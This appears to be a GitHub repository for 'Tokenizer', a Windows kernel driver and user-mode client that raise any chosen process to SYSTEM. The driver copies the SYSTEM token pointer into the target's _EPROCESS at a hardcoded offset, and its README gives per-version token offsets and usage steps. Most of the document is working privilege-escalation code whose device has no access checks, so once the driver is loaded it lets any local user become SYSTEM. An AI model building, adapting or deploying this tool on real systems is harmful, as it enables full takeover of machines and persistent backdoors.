├── Tokenizer
├── Tokenizer.vcxproj.filters
├── Tokenizer.inf
├── Tokenizer.vcxproj
└── driver.c
├── Tokenizer.sln
├── usermode_app
└── source.cpp
├── .gitattributes
├── README.md
└── .gitignore
/Tokenizer/Tokenizer.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 | {8E41214B-6785-4CFE-B992-037D68949A14}
18 | inf;inv;inx;mof;mc;
19 |
20 |
21 |
22 |
23 | Driver Files
24 |
25 |
26 |
27 |
28 | Source Files
29 |
30 |
31 |
--------------------------------------------------------------------------------
/Tokenizer.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.5.33424.131
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Tokenizer", "Tokenizer\Tokenizer.vcxproj", "{B107A7D0-7144-4431-93C6-59CCFE2B2168}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|ARM64 = Debug|ARM64
11 | Debug|x64 = Debug|x64
12 | Release|ARM64 = Release|ARM64
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Debug|ARM64.ActiveCfg = Debug|ARM64
17 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Debug|ARM64.Build.0 = Debug|ARM64
18 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Debug|ARM64.Deploy.0 = Debug|ARM64
19 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Debug|x64.ActiveCfg = Debug|x64
20 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Debug|x64.Build.0 = Debug|x64
21 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Debug|x64.Deploy.0 = Debug|x64
22 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Release|ARM64.ActiveCfg = Release|ARM64
23 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Release|ARM64.Build.0 = Release|ARM64
24 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Release|ARM64.Deploy.0 = Release|ARM64
25 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Release|x64.ActiveCfg = Release|x64
26 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Release|x64.Build.0 = Release|x64
27 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Release|x64.Deploy.0 = Release|x64
28 | EndGlobalSection
29 | GlobalSection(SolutionProperties) = preSolution
30 | HideSolutionNode = FALSE
31 | EndGlobalSection
32 | GlobalSection(ExtensibilityGlobals) = postSolution
33 | SolutionGuid = {C170612B-63F1-46D5-A738-BD78EC60BADC}
34 | EndGlobalSection
35 | EndGlobal
36 |
--------------------------------------------------------------------------------
/usermode_app/source.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | #define ppid CTL_CODE(FILE_DEVICE_UNKNOWN,0x69,METHOD_BUFFERED ,FILE_ANY_ACCESS)
5 |
6 | int
7 | isProcessRunning(
8 | int pid
9 | )
10 | {
11 | HANDLE phandle = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
12 | if (!phandle)
13 | return (-1);
14 | CloseHandle(phandle);
15 | return (0);
16 |
17 | }
18 |
19 | int
20 | wmain(
21 | void
22 | )
23 | {
24 | int pid = 0;
25 | printf("1 to spawn an elevated process\n2 to elevate a specific process:\nPlease enter your input : ");
26 | scanf_s("%d", &pid);
27 | if (pid == 1)
28 | {
29 | pid = GetCurrentProcessId();
30 | }
31 | else if (pid == 2)
32 | {
33 | printf("Enter process ID (pid) :");
34 | scanf_s("%d", &pid);
35 | }
36 | else
37 | {
38 | printf("Invalid Option !\n");
39 | return (-1);
40 | }
41 |
42 | DWORD lpBytesReturned;
43 | HANDLE hdevice = CreateFile(L"\\\\.\\tokenizer", GENERIC_WRITE, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr);
44 | if (hdevice == INVALID_HANDLE_VALUE)
45 | {
46 | printf("failed to open device\n");
47 | return (-1);
48 | }
49 | else
50 | printf("driver device opened\n");
51 |
52 | if (DeviceIoControl(hdevice, ppid, (LPVOID)&pid, sizeof(pid), &lpBytesReturned, sizeof(lpBytesReturned), 0, nullptr))
53 | printf("IOCTL %x sent!\n", ppid);
54 | else
55 | {
56 | printf("Failed to send the IOCTL %x.\n", ppid);
57 | return (-1);
58 | }
59 | if (!lpBytesReturned)
60 | {
61 | printf("Process %d token replaced successfully with system token!\n", pid);
62 | }
63 | else
64 | {
65 | if (!isProcessRunning(pid))
66 | printf("Failed to replace token.\n");
67 | else
68 | printf("Invalid process ID (pid). Please make sure to provide a valid pid.\n");
69 | return (-1);
70 | }
71 | if (pid == GetCurrentProcessId())
72 | {
73 | system("start");
74 | printf("Privileged process spawned successfully\n");
75 | }
76 | CloseHandle(hdevice);
77 | system("pause");
78 | return (0);
79 | }
80 |
--------------------------------------------------------------------------------
/Tokenizer/Tokenizer.inf:
--------------------------------------------------------------------------------
1 | ;
2 | ; Tokenizer.inf
3 | ;
4 |
5 | [Version]
6 | Signature="$WINDOWS NT$"
7 | Class=System ; TODO: specify appropriate Class
8 | ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318} ; TODO: specify appropriate ClassGuid
9 | Provider=%ManufacturerName%
10 | CatalogFile=Tokenizer.cat
11 | DriverVer= ; TODO: set DriverVer in stampinf property pages
12 | PnpLockdown=1
13 |
14 | [DestinationDirs]
15 | DefaultDestDir = 12
16 | Tokenizer_Device_CoInstaller_CopyFiles = 11
17 |
18 | [SourceDisksNames]
19 | 1 = %DiskName%,,,""
20 |
21 | [SourceDisksFiles]
22 | Tokenizer.sys = 1,,
23 | WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll=1 ; make sure the number matches with SourceDisksNames
24 |
25 | ;*****************************************
26 | ; Install Section
27 | ;*****************************************
28 |
29 | [Manufacturer]
30 | %ManufacturerName%=Standard,NT$ARCH$
31 |
32 | [Standard.NT$ARCH$]
33 | %Tokenizer.DeviceDesc%=Tokenizer_Device, Root\Tokenizer ; TODO: edit hw-id
34 |
35 | [Tokenizer_Device.NT]
36 | CopyFiles=Drivers_Dir
37 |
38 | [Drivers_Dir]
39 | Tokenizer.sys
40 |
41 | ;-------------- Service installation
42 | [Tokenizer_Device.NT.Services]
43 | AddService = Tokenizer,%SPSVCINST_ASSOCSERVICE%, Tokenizer_Service_Inst
44 |
45 | ; -------------- Tokenizer driver install sections
46 | [Tokenizer_Service_Inst]
47 | DisplayName = %Tokenizer.SVCDESC%
48 | ServiceType = 1 ; SERVICE_KERNEL_DRIVER
49 | StartType = 3 ; SERVICE_DEMAND_START
50 | ErrorControl = 1 ; SERVICE_ERROR_NORMAL
51 | ServiceBinary = %12%\Tokenizer.sys
52 |
53 | ;
54 | ;--- Tokenizer_Device Coinstaller installation ------
55 | ;
56 |
57 | [Tokenizer_Device.NT.CoInstallers]
58 | AddReg=Tokenizer_Device_CoInstaller_AddReg
59 | CopyFiles=Tokenizer_Device_CoInstaller_CopyFiles
60 |
61 | [Tokenizer_Device_CoInstaller_AddReg]
62 | HKR,,CoInstallers32,0x00010000, "WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll,WdfCoInstaller"
63 |
64 | [Tokenizer_Device_CoInstaller_CopyFiles]
65 | WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll
66 |
67 | [Tokenizer_Device.NT.Wdf]
68 | KmdfService = Tokenizer, Tokenizer_wdfsect
69 | [Tokenizer_wdfsect]
70 | KmdfLibraryVersion = $KMDFVERSION$
71 |
72 | [Strings]
73 | SPSVCINST_ASSOCSERVICE= 0x00000002
74 | ManufacturerName="" ;TODO: Replace with your manufacturer name
75 | DiskName = "Tokenizer Installation Disk"
76 | Tokenizer.DeviceDesc = "Tokenizer Device"
77 | Tokenizer.SVCDESC = "Tokenizer Service"
78 |
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Tokenizer
2 |
3 | * Tokenizer is a kernel mode driver project that allows the replacement of a process token in `EPROCESS` with a system token, effectively elevating the privileges of the process, The driver is designed to be used with a user-mode application that sends a process ID to the driver through an `IOCTL`.
4 |
5 | # technical details
6 |
7 | * When a process is created, it inherits the token of the user who created it, The token is used by the system to determine what actions the process can perform. The token contains information about the user's security identifier (SID), group memberships, and privileges.
8 |
9 | 
10 |
11 | * The Token member resides at offset `0x4b8` in the `_EPROCESS` structure, which is a data structure that represents a process object. The Token member is defined in `_EX_FAST_REF` structure, which is a union type that can store either a pointer to a kernel object or a reference count, depending on the size of the pointer , The offset of the `_EX_FAST_REF` structure within `_EPROCESS` depends on the specific version of Windows being used, but it is typically located at an offset of `0x4b8` in recent versions of Windows..
12 |
13 | * Windows Build Number token Offsets for x64 and x86 Architectures
14 |
15 | | x64 offsets | x86 offsets |
16 | | --------------| ------------------ |
17 | | 0x0160 (late 5.2) | 0x0150 (3.10) |
18 | | 0x0168 (6.0) | 0x0108 (3.50 to 4.0) |
19 | | 0x0208 (6.1) | 0x012C (5.0) |
20 | | 0x0348 (6.2 to 6.3) | 0xC8 (5.1 to early 5.2) |
21 | | 0x0358 (10.0 to 1809) | 0xD8 (late 5.2) |
22 | | 0x0360 (1903) | 0xE0 (6.0) |
23 | | 0x04B8 | 0xF8 (6.1) |
24 | | | 0xEC (6.2 to 6.3) |
25 | | | 0xF4 (10.0 to 1607) |
26 | | | 0xFC (1703 to 1903) |
27 | | | 0x012C |
28 |
29 |
30 | 
31 |
32 | * The `_EX_FAST_REF` structure in Windows contains three members: `Object` and `RefCount` and `Value`
33 |
34 | 
35 |
36 | * To display the process token in `_EX_FAST_REF`,We pass the address of the `_EX_FAST_REF` structure that contains the token, which is typically located at an offset of `0x4b8` in the `_EPROCESS` structure."
37 |
38 | 
39 |
40 | # Usage
41 |
42 | * You can either spawn a privileged process or elevate an already existing process ID.
43 |
44 | 
45 |
46 | * For the sake of this explanation, we will focus on the second option and use CMD as an example
47 |
48 | 
49 |
50 | * inherited Token
51 |
52 | 
53 |
54 | * send the Process ID to the driver through an IOCTL
55 |
56 | 
57 |
58 |
59 | * After receiving the PID from the user mode application, the driver uses it to obtain a pointer to the `_EPROCESS` structure for the target process. The driver then accesses the Token member of the `_EPROCESS` structure to obtain a pointer to the process token, which it replaces with the system token, effectively changing the security context of the process to that of the system. However, if the driver does not correctly locate the Token member within the `_EPROCESS` structure or if the offset of the Token is other than `0x4b8` , the driver may crash the system or the target process ,this problem will be fixed in the next updates .
60 |
61 | 
62 |
63 | * cmd token after
64 |
65 | 
66 |
67 | * the process privileges, groups, rights
68 |
69 | 
70 |
71 | # DEMO
72 |
73 | https://user-images.githubusercontent.com/60795188/226200873-d0516968-b175-4ff4-8e85-02018c641679.mp4
74 |
75 |
76 |
--------------------------------------------------------------------------------
/Tokenizer/Tokenizer.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | x64
7 |
8 |
9 | Release
10 | x64
11 |
12 |
13 | Debug
14 | ARM64
15 |
16 |
17 | Release
18 | ARM64
19 |
20 |
21 |
22 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}
23 | {1bc93793-694f-48fe-9372-81e2b05556fd}
24 | v4.5
25 | 12.0
26 | Debug
27 | x64
28 | Tokenizer
29 |
30 |
31 |
32 | Windows10
33 | true
34 | WindowsKernelModeDriver10.0
35 | Driver
36 | KMDF
37 | Universal
38 | false
39 |
40 |
41 | Windows10
42 | false
43 | WindowsKernelModeDriver10.0
44 | Driver
45 | KMDF
46 | Universal
47 |
48 |
49 | Windows10
50 | true
51 | WindowsKernelModeDriver10.0
52 | Driver
53 | KMDF
54 | Universal
55 |
56 |
57 | Windows10
58 | false
59 | WindowsKernelModeDriver10.0
60 | Driver
61 | KMDF
62 | Universal
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | DbgengKernelDebugger
74 |
75 |
76 | DbgengKernelDebugger
77 |
78 |
79 | DbgengKernelDebugger
80 |
81 |
82 | DbgengKernelDebugger
83 |
84 |
85 |
86 | sha256
87 |
88 |
89 | false
90 |
91 |
92 |
93 |
94 | sha256
95 |
96 |
97 |
98 |
99 | sha256
100 |
101 |
102 |
103 |
104 | sha256
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
--------------------------------------------------------------------------------
/Tokenizer/driver.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | typedef PEPROCESS(*t_PsGetNextProcess)(PEPROCESS Process);
5 | t_PsGetNextProcess PsGetNextProcess;
6 | typedef PEPROCESS _PEPROCESS;
7 | NTKERNELAPI PVOID PsGetProcessSectionBaseAddress(__in PEPROCESS Process);
8 |
9 | #define ppid CTL_CODE(FILE_DEVICE_UNKNOWN,0x69,METHOD_BUFFERED ,FILE_ANY_ACCESS)
10 | UNICODE_STRING DeviceName = RTL_CONSTANT_STRING(L"\\Device\\Tokenizer");
11 | UNICODE_STRING SymbName = RTL_CONSTANT_STRING(L"\\??\\Tokenizer");
12 |
13 | NTSTATUS NTAPI MmCopyVirtualMemory
14 | (
15 | PEPROCESS SourceProcess,
16 | PVOID SourceAddress,
17 | PEPROCESS TargetProcess,
18 | PVOID TargetAddress,
19 | SIZE_T BufferSize,
20 | KPROCESSOR_MODE PreviousMode,
21 | PSIZE_T ReturnSize
22 | );
23 | char* PsGetProcessImageFileName(PEPROCESS Process);
24 |
25 | int
26 | ParseAndReplaceEProcessToken(
27 | int pid
28 | )
29 | {
30 | PVOID process = NULL;
31 | PVOID sys = NULL;
32 | PACCESS_TOKEN TargetToken;
33 | PACCESS_TOKEN sysToken;
34 | __try
35 | {
36 |
37 | NTSTATUS ret = PsLookupProcessByProcessId((HANDLE)pid, &process);
38 | if (ret != STATUS_SUCCESS)
39 | {
40 | if (ret == STATUS_INVALID_PARAMETER)
41 | {
42 | DbgPrint("the process ID was not found.");
43 | }
44 | if (ret == STATUS_INVALID_CID)
45 | {
46 | DbgPrint("the specified client ID is not valid.");
47 | }
48 | return (-1);
49 | }
50 | PsLookupProcessByProcessId((HANDLE)0x4, &sys); // system process
51 |
52 | if (ret != STATUS_SUCCESS)
53 | {
54 | if (ret == STATUS_INVALID_PARAMETER)
55 | {
56 | DbgPrint("system process ID was not found.");
57 | }
58 | if (ret == STATUS_INVALID_CID)
59 | {
60 | DbgPrint("the system ID is not valid.");
61 | }
62 | ObDereferenceObject(process);
63 | return (-1);
64 | }
65 | char* ImageName;
66 |
67 | DbgPrint("target process image name : %s \n", ImageName = PsGetProcessImageFileName((PEPROCESS)process));
68 |
69 | TargetToken = PsReferencePrimaryToken(process);
70 | if (!TargetToken)
71 | {
72 | ObDereferenceObject(sys);
73 | ObDereferenceObject(process);
74 | return (-1);
75 | }
76 | DbgPrint("%s token : %x\n", ImageName, TargetToken);
77 |
78 | sysToken = PsReferencePrimaryToken(sys);
79 | if (!sysToken)
80 | {
81 | ObDereferenceObject(sys);
82 | ObDereferenceObject(TargetToken);
83 | ObDereferenceObject(process);
84 | return (-1);
85 | }
86 | DbgPrint("system token : %x\n", sysToken);
87 |
88 | ULONG_PTR UniqueProcessIdAddress = (ULONG_PTR)process + 0x4b8;
89 |
90 | DbgPrint("%s token address %x\n", ImageName, UniqueProcessIdAddress);
91 |
92 | unsigned long long UniqueProcessId = *(PHANDLE)UniqueProcessIdAddress;
93 |
94 |
95 | ULONG_PTR sysadd = (ULONG_PTR)sys + 0x4b8;
96 |
97 | DbgPrint("system token address : %x\n", sysadd);
98 |
99 | unsigned long long usysid = *(PHANDLE)sysadd;
100 |
101 | *(PHANDLE)UniqueProcessIdAddress = *(PHANDLE)sysadd;
102 |
103 | DbgPrint("process %s Token updated to :%x ", ImageName, *(PHANDLE)(UniqueProcessIdAddress));
104 |
105 | for (int i = 1; i < 8; i++)
106 | {
107 | unsigned char f = *(PHANDLE)(UniqueProcessIdAddress + i);
108 | DbgPrint(" %x ", f);
109 | }
110 |
111 | DbgPrint("\n");
112 | }
113 | __except (EXCEPTION_EXECUTE_HANDLER)
114 | {
115 | return (-1);
116 | }
117 |
118 | ObDereferenceObject(sys);
119 | ObDereferenceObject(TargetToken);
120 | ObDereferenceObject(sysToken);
121 | ObDereferenceObject(process);
122 | return (0);
123 | }
124 |
125 | void
126 | unloadv(
127 | PDRIVER_OBJECT driverObject
128 | )
129 | {
130 | IoDeleteSymbolicLink(&SymbName);
131 | IoDeleteDevice(driverObject->DeviceObject);
132 | DbgPrint("Driver Unloaded\n");
133 | }
134 |
135 |
136 | NTSTATUS processIoctlRequest(
137 | DEVICE_OBJECT* DeviceObject,
138 | IRP* Irp
139 | )
140 | {
141 | PIO_STACK_LOCATION pstack = IoGetCurrentIrpStackLocation(Irp);
142 | int pstatus = 0;
143 | if (pstack->Parameters.DeviceIoControl.IoControlCode == ppid)
144 | {
145 | int inputInt = 0;
146 |
147 | RtlCopyMemory(&inputInt, Irp->AssociatedIrp.SystemBuffer, sizeof(inputInt));
148 |
149 | pstatus = ParseAndReplaceEProcessToken(inputInt);
150 |
151 | DbgPrint("Received input value: %d\n", inputInt);
152 | }
153 | memcpy(Irp->AssociatedIrp.SystemBuffer, &pstatus, sizeof(pstatus));
154 | Irp->IoStatus.Status = 0;
155 | Irp->IoStatus.Information = sizeof(int);
156 | IoCompleteRequest(Irp, IO_NO_INCREMENT);
157 | }
158 |
159 | void IRP_MJCreate()
160 | {
161 | DbgPrint("IRP_CREATED\n");
162 |
163 | }
164 | void IRP_MJClose()
165 | {
166 | DbgPrint("IRP_Closed\n");
167 |
168 | }
169 | NTSTATUS
170 | DriverEntry(
171 | PDRIVER_OBJECT driverObject,
172 | PUNICODE_STRING registryPath
173 | )
174 | {
175 | DbgPrint("Driver Loaded\n");
176 | UNREFERENCED_PARAMETER(registryPath);
177 | UNREFERENCED_PARAMETER(driverObject);
178 |
179 | driverObject->DriverUnload = &unloadv;
180 | driverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = processIoctlRequest;
181 | driverObject->MajorFunction[IRP_MJ_CREATE] = IRP_MJCreate;
182 | driverObject->MajorFunction[IRP_MJ_CLOSE] = IRP_MJClose;
183 |
184 | IoCreateDevice(driverObject, 0, &DeviceName, FILE_DEVICE_UNKNOWN, METHOD_BUFFERED, FALSE, &driverObject->DeviceObject);
185 | IoCreateSymbolicLink(&SymbName, &DeviceName);
186 | return STATUS_SUCCESS;
187 | }
188 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Oo]ut/
33 | [Ll]og/
34 | [Ll]ogs/
35 |
36 | # Visual Studio 2015/2017 cache/options directory
37 | .vs/
38 | # Uncomment if you have tasks that create the project's static files in wwwroot
39 | #wwwroot/
40 |
41 | # Visual Studio 2017 auto generated files
42 | Generated\ Files/
43 |
44 | # MSTest test Results
45 | [Tt]est[Rr]esult*/
46 | [Bb]uild[Ll]og.*
47 |
48 | # NUnit
49 | *.VisualState.xml
50 | TestResult.xml
51 | nunit-*.xml
52 |
53 | # Build Results of an ATL Project
54 | [Dd]ebugPS/
55 | [Rr]eleasePS/
56 | dlldata.c
57 |
58 | # Benchmark Results
59 | BenchmarkDotNet.Artifacts/
60 |
61 | # .NET Core
62 | project.lock.json
63 | project.fragment.lock.json
64 | artifacts/
65 |
66 | # ASP.NET Scaffolding
67 | ScaffoldingReadMe.txt
68 |
69 | # StyleCop
70 | StyleCopReport.xml
71 |
72 | # Files built by Visual Studio
73 | *_i.c
74 | *_p.c
75 | *_h.h
76 | *.ilk
77 | *.meta
78 | *.obj
79 | *.iobj
80 | *.pch
81 | *.pdb
82 | *.ipdb
83 | *.pgc
84 | *.pgd
85 | *.rsp
86 | *.sbr
87 | *.tlb
88 | *.tli
89 | *.tlh
90 | *.tmp
91 | *.tmp_proj
92 | *_wpftmp.csproj
93 | *.log
94 | *.vspscc
95 | *.vssscc
96 | .builds
97 | *.pidb
98 | *.svclog
99 | *.scc
100 |
101 | # Chutzpah Test files
102 | _Chutzpah*
103 |
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 |
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 |
121 | # Visual Studio Trace Files
122 | *.e2e
123 |
124 | # TFS 2012 Local Workspace
125 | $tf/
126 |
127 | # Guidance Automation Toolkit
128 | *.gpState
129 |
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 |
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 |
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 |
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 |
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*.json
147 | coverage*.xml
148 | coverage*.info
149 |
150 | # Visual Studio code coverage results
151 | *.coverage
152 | *.coveragexml
153 |
154 | # NCrunch
155 | _NCrunch_*
156 | .*crunch*.local.xml
157 | nCrunchTemp_*
158 |
159 | # MightyMoose
160 | *.mm.*
161 | AutoTest.Net/
162 |
163 | # Web workbench (sass)
164 | .sass-cache/
165 |
166 | # Installshield output folder
167 | [Ee]xpress/
168 |
169 | # DocProject is a documentation generator add-in
170 | DocProject/buildhelp/
171 | DocProject/Help/*.HxT
172 | DocProject/Help/*.HxC
173 | DocProject/Help/*.hhc
174 | DocProject/Help/*.hhk
175 | DocProject/Help/*.hhp
176 | DocProject/Help/Html2
177 | DocProject/Help/html
178 |
179 | # Click-Once directory
180 | publish/
181 |
182 | # Publish Web Output
183 | *.[Pp]ublish.xml
184 | *.azurePubxml
185 | # Note: Comment the next line if you want to checkin your web deploy settings,
186 | # but database connection strings (with potential passwords) will be unencrypted
187 | *.pubxml
188 | *.publishproj
189 |
190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
191 | # checkin your Azure Web App publish settings, but sensitive information contained
192 | # in these scripts will be unencrypted
193 | PublishScripts/
194 |
195 | # NuGet Packages
196 | *.nupkg
197 | # NuGet Symbol Packages
198 | *.snupkg
199 | # The packages folder can be ignored because of Package Restore
200 | **/[Pp]ackages/*
201 | # except build/, which is used as an MSBuild target.
202 | !**/[Pp]ackages/build/
203 | # Uncomment if necessary however generally it will be regenerated when needed
204 | #!**/[Pp]ackages/repositories.config
205 | # NuGet v3's project.json files produces more ignorable files
206 | *.nuget.props
207 | *.nuget.targets
208 |
209 | # Microsoft Azure Build Output
210 | csx/
211 | *.build.csdef
212 |
213 | # Microsoft Azure Emulator
214 | ecf/
215 | rcf/
216 |
217 | # Windows Store app package directories and files
218 | AppPackages/
219 | BundleArtifacts/
220 | Package.StoreAssociation.xml
221 | _pkginfo.txt
222 | *.appx
223 | *.appxbundle
224 | *.appxupload
225 |
226 | # Visual Studio cache files
227 | # files ending in .cache can be ignored
228 | *.[Cc]ache
229 | # but keep track of directories ending in .cache
230 | !?*.[Cc]ache/
231 |
232 | # Others
233 | ClientBin/
234 | ~$*
235 | *~
236 | *.dbmdl
237 | *.dbproj.schemaview
238 | *.jfm
239 | *.pfx
240 | *.publishsettings
241 | orleans.codegen.cs
242 |
243 | # Including strong name files can present a security risk
244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
245 | #*.snk
246 |
247 | # Since there are multiple workflows, uncomment next line to ignore bower_components
248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
249 | #bower_components/
250 |
251 | # RIA/Silverlight projects
252 | Generated_Code/
253 |
254 | # Backup & report files from converting an old project file
255 | # to a newer Visual Studio version. Backup files are not needed,
256 | # because we have git ;-)
257 | _UpgradeReport_Files/
258 | Backup*/
259 | UpgradeLog*.XML
260 | UpgradeLog*.htm
261 | ServiceFabricBackup/
262 | *.rptproj.bak
263 |
264 | # SQL Server files
265 | *.mdf
266 | *.ldf
267 | *.ndf
268 |
269 | # Business Intelligence projects
270 | *.rdl.data
271 | *.bim.layout
272 | *.bim_*.settings
273 | *.rptproj.rsuser
274 | *- [Bb]ackup.rdl
275 | *- [Bb]ackup ([0-9]).rdl
276 | *- [Bb]ackup ([0-9][0-9]).rdl
277 |
278 | # Microsoft Fakes
279 | FakesAssemblies/
280 |
281 | # GhostDoc plugin setting file
282 | *.GhostDoc.xml
283 |
284 | # Node.js Tools for Visual Studio
285 | .ntvs_analysis.dat
286 | node_modules/
287 |
288 | # Visual Studio 6 build log
289 | *.plg
290 |
291 | # Visual Studio 6 workspace options file
292 | *.opt
293 |
294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
295 | *.vbw
296 |
297 | # Visual Studio LightSwitch build output
298 | **/*.HTMLClient/GeneratedArtifacts
299 | **/*.DesktopClient/GeneratedArtifacts
300 | **/*.DesktopClient/ModelManifest.xml
301 | **/*.Server/GeneratedArtifacts
302 | **/*.Server/ModelManifest.xml
303 | _Pvt_Extensions
304 |
305 | # Paket dependency manager
306 | .paket/paket.exe
307 | paket-files/
308 |
309 | # FAKE - F# Make
310 | .fake/
311 |
312 | # CodeRush personal settings
313 | .cr/personal
314 |
315 | # Python Tools for Visual Studio (PTVS)
316 | __pycache__/
317 | *.pyc
318 |
319 | # Cake - Uncomment if you are using it
320 | # tools/**
321 | # !tools/packages.config
322 |
323 | # Tabs Studio
324 | *.tss
325 |
326 | # Telerik's JustMock configuration file
327 | *.jmconfig
328 |
329 | # BizTalk build output
330 | *.btp.cs
331 | *.btm.cs
332 | *.odx.cs
333 | *.xsd.cs
334 |
335 | # OpenCover UI analysis results
336 | OpenCover/
337 |
338 | # Azure Stream Analytics local run output
339 | ASALocalRun/
340 |
341 | # MSBuild Binary and Structured Log
342 | *.binlog
343 |
344 | # NVidia Nsight GPU debugger configuration file
345 | *.nvuser
346 |
347 | # MFractors (Xamarin productivity tool) working folder
348 | .mfractor/
349 |
350 | # Local History for Visual Studio
351 | .localhistory/
352 |
353 | # BeatPulse healthcheck temp database
354 | healthchecksdb
355 |
356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
357 | MigrationBackup/
358 |
